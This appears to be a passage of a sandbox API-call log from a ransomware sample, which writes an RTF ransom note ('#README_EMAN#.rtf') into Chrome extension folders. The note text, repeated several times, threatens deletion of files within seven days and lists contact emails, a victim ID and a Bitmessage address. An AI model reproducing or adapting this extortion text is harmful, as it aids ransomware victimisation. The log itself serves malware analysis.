t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nú¯Õ%\x048èõù^=«\x16O\x1fïж>\x9bXË\x7f\x03\r", lpUsedDefaultChar=0x0) returned 8717 [0297.622] WriteFile (in: hFile=0x294, lpBuffer=0x24866c8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x24866c8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0297.623] CloseHandle (hObject=0x294) returned 1 [0297.623] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_CN\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_cn\\#readme_eman#.rtf")) returned 0xffffffff [0297.623] GetLastError () returned 0x2 [0297.623] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_CN\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_cn\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0297.628] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0297.628] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0297.629] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x24866c8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 